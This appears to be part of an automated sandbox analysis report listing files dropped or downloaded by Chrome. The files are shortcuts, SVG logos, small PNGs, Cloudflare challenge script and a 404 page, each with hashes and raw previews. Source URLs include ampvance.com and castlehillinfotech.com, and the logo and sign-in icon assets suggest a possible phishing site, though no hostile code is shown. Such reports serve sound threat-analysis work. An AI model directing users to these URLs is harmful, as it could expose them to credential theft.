                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 5 12:24:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.979488129522421
                                                      Encrypted:false
                                                      SSDEEP:48:8sdJTRJh+HUidAKZdA1vehDiZUkwqehyMy+R:8ybyIMy
                                                      MD5:43388AC680C8E59B698D00095108C300
                                                      SHA1:B3A9C330C2D58CA8B8D476E867FB434D63A21AD6
                                                      SHA-256:00682AB4FCC4E64278BD0D5B6ACE774CBD6CFE96F7D920232BF763249C2DB469
                                                      SHA-512:146BDD3949EA62F684FE8C707E23B30CC69C7226BDC840B1793A178A2020D3C9917F48FBBF979C089F1F3972184E9C84BA759B7FE557D3A4B1FE97D5182D60B7
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,.....-.t.o..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeX.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 5 12:24:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2681
                                                      Entropy (8bit):3.97148820738138
                                                      Encrypted:false
                                                      SSDEEP:48:8XOdJTRJh+HUidAKZdA1hehBiZUk1W1qeh0My+C:8MbC9UMy
                                                      MD5:0FF25837A2BA3E761B4D150F5711BB4E
                                                      SHA1:4A1074116E48EE2E80008D300E94B712AC0EF308
                                                      SHA-256:D046E0B2A3630C35AF8A6E0F63BA1F6A0C0294630B9B10775B7F268B8CC016B0
                                                      SHA-512:7F746C47A986FAB72BAE44BB1A625AA36980AB48E4A4C5702563472090DC3A3B6A829A0C92B89E5707B38C1391D168199F5F72573E2D21A044E3FE599EED8F33
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,.......t.o..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeX.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Mar 5 12:24:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                      Category:dropped
                                                      Size (bytes):2683
                                                      Entropy (8bit):3.983958289740031
                                                      Encrypted:false
                                                      SSDEEP:48:86dJTRJh+HUidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbqMy+yT+:8Yb8T/TbxWOvTbqMy7T
                                                      MD5:20CB835D1C20A7570E6F10D0CE00F0CE
                                                      SHA1:26F9EDE1BB3ACC48F0BF5040012717072191270D
                                                      SHA-256:4BC96BFB76156707183856B19154113F5F141628C4DB0E04EE565225A7E06F43
                                                      SHA-512:37CF1B922BF1A7A646212104A518AF3D216A27980500004BBC30FA28E6F0072B53D6F673FF2A812F96A25DB3610B3B7973066ED4DB85DC1EE70B9615DC035337
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:L..................F.@.. ...$+.,......s.o..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IeX.k....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeX.k....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VeX.k....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VeX.k..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VeX.k...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............6.8.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (39034)
                                                      Category:downloaded
                                                      Size (bytes):39035
                                                      Entropy (8bit):5.376015994898
                                                      Encrypted:false
                                                      SSDEEP:768:0CFtCHnWW/i+s3hPbBL3eDTeJwKNgQOYfGM10/38nZC5XZzz8FkNcX8xKJ:oHnWai+s3hPbd3eDTeJFgQl11WQ
                                                      MD5:2C6914D08E921FD932A0BE1BE0E1CF4F
                                                      SHA1:7621BC83E401BB8675F5783F31E13816791BD37B
                                                      SHA-256:F2D1C49F53AD2BEDBB54B6AD29F17EA493D7DA967F7487C7DD1493FFA7CD5BCC
                                                      SHA-512:E4814AC33CF6C8E3398E83236ACFA731BA06168FA13F33E3A11F0CDEBB7BBAFF01085FE581AAC3718A46C4EC29D04CBCA6ED7FCF41CFA4131F6C8AEC46A15A16
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit
                                                      Preview:"use strict";(function(){function pt(e,r,t,i,f,s,g){try{var v=e[s](g),y=v.value}catch(u){t(u);return}v.done?r(y):Promise.resolve(y).then(i,f)}function vt(e){return function(){var r=this,t=arguments;return new Promise(function(i,f){var s=e.apply(r,t);function g(y){pt(s,i,f,g,v,"next",y)}function v(y){pt(s,i,f,g,v,"throw",y)}g(void 0)})}}function k(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):k(e,r)}function xe(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ue(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},i=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(i=i.concat(Object.getOwnPropertySymbols(t).filter(function(f){return Object.getOwnPropertyDescriptor(t,f).enumerable}))),i.forEach(function(f){xe(e,f,t[f])})}return e}function mt(e){if(Array.isArray(e))return e}function gt(e,r){var t=e==null?null:typeof Symbol!="und
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):3.990210155325004
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                      MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                      SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                      SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                      SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:HTML document, ASCII text
                                                      Category:downloaded
                                                      Size (bytes):283
                                                      Entropy (8bit):5.129401547760382
                                                      Encrypted:false
                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoIRVYxQ3RJ2uNBFm8oD:J0+oxBeRmR9etdzRxGezHL/RJq8+
                                                      MD5:7F262C95E501BF3E3DA3BA18429C25F0
                                                      SHA1:569680D95F4D96D7ADD5570FB977B95F0FED7A65
                                                      SHA-256:46817172A20E26C25774708CBFC5F6E1AB0F756BF217ED3C0500DFAF558A17DD
                                                      SHA-512:D4501DD404FB0C7D8BF51DEA24CF930A541E38410DCAF8D46D482B28935C7629C2A2C2735ADA8FC2A917F73EFBB1F750E5F2DAB4B1794E1071917222B3CFA55E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://rfpcertstream.castlehillinfotech.com/favicon.ico
                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<hr>.<address>Apache Server at rfpcertstream.castlehillinfotech.com Port 443</address>.</body></html>.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 83 x 42, 8-bit/color RGB, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770307
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPlS3qVJhshkxl/k4E08up:6v/lhPkaVJ6hk7Tp
                                                      MD5:DCDCA0C2F0EABDF30280BB163D632359
                                                      SHA1:223DA04D66355C394CF775891B9093018A6870F4
                                                      SHA-256:A055169967154899019357C39C2B60251300C7283550F1C88904AFB62B26E493
                                                      SHA-512:6BAFCC97BE24C16456ABCA3206487468353FE3D7F57B23A91E10AFED8047CA94104D8C84958B98D7D349A481E23FA40F2028F1EDAD9F18C9FFCE8D4CFA4BB964
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/85fa6d617a504235/1709645077934/5cNZbzk38vkU6ml
                                                      Preview:.PNG........IHDR...S...*.....@..^....IDAT.....$.....IEND.B`.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):1864
                                                      Entropy (8bit):5.222032823730197
                                                      Encrypted:false
                                                      SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/x/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cee7
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1864
                                                      Entropy (8bit):5.222032823730197
                                                      Encrypted:false
                                                      SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                      MD5:BC3D32A696895F78C19DF6C717586A5D
                                                      SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                      SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                      SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:dropped
                                                      Size (bytes):1592
                                                      Entropy (8bit):4.205005284721148
                                                      Encrypted:false
                                                      SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                      MD5:4E48046CE74F4B89D45037C90576BFAC
                                                      SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                      SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                      SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):3651
                                                      Entropy (8bit):4.094801914706141
                                                      Encrypted:false
                                                      SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/o/3485ef1ed169dedf7c7dc623777c6a8065e71d2f8cf01
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:SVG Scalable Vector Graphics image
                                                      Category:downloaded
                                                      Size (bytes):1592
                                                      Entropy (8bit):4.205005284721148
                                                      Encrypted:false
                                                      SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                      MD5:4E48046CE74F4B89D45037C90576BFAC
                                                      SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                      SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                      SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://ampvance.com/ASSETS/img/sig-op.svg
                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 83 x 42, 8-bit/color RGB, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):61
                                                      Entropy (8bit):4.068159130770307
                                                      Encrypted:false
                                                      SSDEEP:3:yionv//thPlS3qVJhshkxl/k4E08up:6v/lhPkaVJ6hk7Tp
                                                      MD5:DCDCA0C2F0EABDF30280BB163D632359
                                                      SHA1:223DA04D66355C394CF775891B9093018A6870F4
                                                      SHA-256:A055169967154899019357C39C2B60251300C7283550F1C88904AFB62B26E493
